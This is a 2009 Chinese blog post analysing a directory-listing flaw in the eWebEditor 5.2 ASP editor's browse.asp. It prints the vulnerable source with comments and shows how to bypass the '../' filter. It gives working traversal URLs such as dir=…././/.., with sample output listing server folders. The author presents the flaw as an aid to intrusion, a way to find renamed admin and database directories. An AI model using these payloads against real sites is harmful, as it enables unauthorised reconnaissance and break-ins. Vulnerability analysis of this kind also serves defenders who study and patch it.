|
|
ewebeditor 5.2 列目录漏洞
作者:st0p
由于自己做站用的编辑器是以前自己精简的ewebeditor 5.2 asp版本,干活累了,想休息一下,就分析了一个这个编辑器,没想到,还真让我发现了一个小漏洞,虽然作用不大,不过用来辅助还是蛮不错的.
出现漏洞的文件存在于ewebeditor/asp/browse.asp
ASP/Visual Basic代码
Function GetList()
Dim s_List, s_Url
s_List = ""
Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
'Response.Write sCurrDir
'On Error Resume Next
Set oFSO = Server.CreateObject("Scripting.FileSystemObject")
Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir))
'注意一下sCurrDir变量,这个值等下我们可以用到
If Err.Number>0 Then
s_List = ""
Exit Function
End If
If sDir <> "" Then
If InstrRev(sDir, "/") > 1 Then
s_Url= Left(sDir, InstrRev(sDir, "/") - 1)
Else
s_Url = ""
End If
s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
"<td><img border=0 src='../sysimage/file/parentfolder.gif'></td>" & _
"<td>..</td>" & _
"<td> </td>" & _
"</tr>"
End If
'Response.Write sDir&"!"&s_List
Dim oSubFolder
For Each oSubFolder In oUploadFolder.SubFolders
'Response.Write oUploadFolder.SubFolders
If sDir = "" Then
s_Url = oSubFolder.Name
Else
s_Url = sDir & "/" & oSubFolder.Name
End If
s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
"<td><img border=0 src='../sysimage/file/closedfolder.gif'></td>" & _
"<td noWrap>" & oSubFolder.Name & "</td>" & _
"<td> </td>" & _
"</tr>"
Next
'Response.Write s_List
Set oUploadFiles = oUploadFolder.Files
For Each oUploadFile In oUploadFiles
'Response.Write oUploadFile.Name
sFileName = oUploadFile.Name
If CheckValidExt(sFileName) = True Then
'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了
If sDir = "" Then
s_Url = sContentPath & sFileName
Else
s_Url = sContentPath & sDir & "/" & sFileName
End If
s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' url='" & s_Url & "'>" & _
"<td>" & FileName2Pic(sFileName) & "</td>" & _
"<td noWrap>" & sFileName & "</td>" & _
"<td align=right>" & GetSizeUnit(oUploadFile.size) & "</td>" & _
"</tr>"
End If
Next
Set oUploadFolder = Nothing
Set oUploadFiles = Nothing
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
If sDir = "" Then
s_Url = ""
's_Url = "/"
Else
s_Url = "/" & sDir & ""
's_Url = "/" & sDir & "/"
End If
s_List = s_List & "</table>"
s_List = HTML2JS(s_List)
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
GetList = s_List
End Function
'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名
Function CheckValidExt(s_FileName)
If sAllowExt = "" Then
CheckValidExt = True
Exit Function
End If
Dim i, aExt, sExt
sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
CheckValidExt = False
aExt = Split(LCase(sAllowExt), "|")
For i = 0 To UBound(aExt)
If aExt(i) = sExt Then
CheckValidExt = True
Exit Function
End If
Next
End Function
'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的
Sub InitParam()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), "|||")
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next
If bValidStyle = False Then
OutScript("alert('Invalid Style.')")
End If
sBaseUrl = aStyleConfig(19)
'nAllowBrowse = CLng(aStyleConfig(43))
nAllowBrowse = 1
If nAllowBrowse <> 1 Then
OutScript("alert('Do not allow browse!')")
End If
sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <> "/" Then
Select Case sType
Case "REMOTE"
sUploadDir = "../../" & sUploadDir & "Image/"
Case "FILE"
sUploadDir = "../../" & sUploadDir & "Other/"
Case "MEDIA"
sUploadDir = "../../" & sUploadDir & "Media/"
Case "FLASH"
sUploadDir = "../../" & sUploadDir & "Flash/"
Case Else
sUploadDir = "../../" & sUploadDir & "Image/"
End Select
End If
'sUploadDir =sUploadDir &"/"
Select Case sBaseUrl
Case "0"
'sContentPath = aStyleConfig(23)
Select Case sType
Case "REMOTE"
sContentPath = "../" & aStyleConfig(3) & "Image/"
Case "FILE"
sContentPath = "../" & aStyleConfig(3) & "Other/"
Case "MEDIA"
sContentPath = "../" & aStyleConfig(3) & "Media/"
Case "FLASH"
sContentPath = "../" & aStyleConfig(3) & "Flash/"
Case Else
sContentPath = "../" & aStyleConfig(3) & "Image/"
End Select
Case "1"
sContentPath = RelativePath2RootPath(sUploadDir)
Case "2"
sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select
Select Case sType
Case "REMOTE"
sAllowExt = aStyleConfig(10)
Case "FILE"
sAllowExt = aStyleConfig(6)
Case "MEDIA"
sAllowExt = aStyleConfig(9)
Case "FLASH"
sAllowExt = aStyleConfig(7)
Case Else
sAllowExt = aStyleConfig(8)
End Select
sCurrDir = sUploadDir '注意这里,这个是得到了配置的路径地址
sDir = Trim(Request("dir")) '得到dir变量
sDir = Replace(sDir, "\", "/") '对dir变量进行过滤
sDir = Replace(sDir, "../", "")
sDir = Replace(sDir, "./", "")
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & "/"
'重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了
'虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用st0p会在下面的利用中给出
Else
sDir = ""
End If
End If
End Sub
嘿嘿,看到这你应该明白了,其实就是对dir过滤的问题,我们完全可以构造特殊的值来跳过验证,这样就可以得到目录结构和显示设置文件中允许的文件后缀的文件了..
利用方法如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
由于st0p测试的时候,上传目录是根目录下的uploadfile,通过上面的地址就可以得到根目录下的所有目录了.
嘿嘿,如果你发现打开的时候显示的是空白,不要灰心,这就对了,直接查看源代码,看到了吗,里面就有你根目录的目录名字了.
嘿嘿,他根目录下有个guest目录,我们通过下面的地址可以列出他下面的结构
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/guest
然后我们也可以通过
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/../…././/..
可以往更上层跳,我测试的那个虚拟主机,得到的是www,logfile,datebase这三个目录.
<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=utf-8'><TITLE>eWebEditor</TITLE></head><body><script language=javascript>parent.setDirList("<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../..'><td><img border=0 src='../sysimage/file/parentfolder.gif'></td><td>..</td><td> </td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../logfiles'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>logfiles</td><td> </td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../www'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>www</td><td> </td></tr></table>", "/../../..")</script></body></html>
这个漏洞只能算是在入侵检测的时候辅助使用,可以得到目录结构,比如说更改了管理目录了,数据库目录了,这样就可以得到目录名字了,不过没法列出文件就让st0p郁闷了,唉….
这是st0p在blog上发的第二篇原创文件,以后会多发一些的,嘎,现在也算blog开张了..
注意:网址中跳目录用到的全是.我发现前台会被替换掉。 |
|
发表于 2009-8-10 07:45:29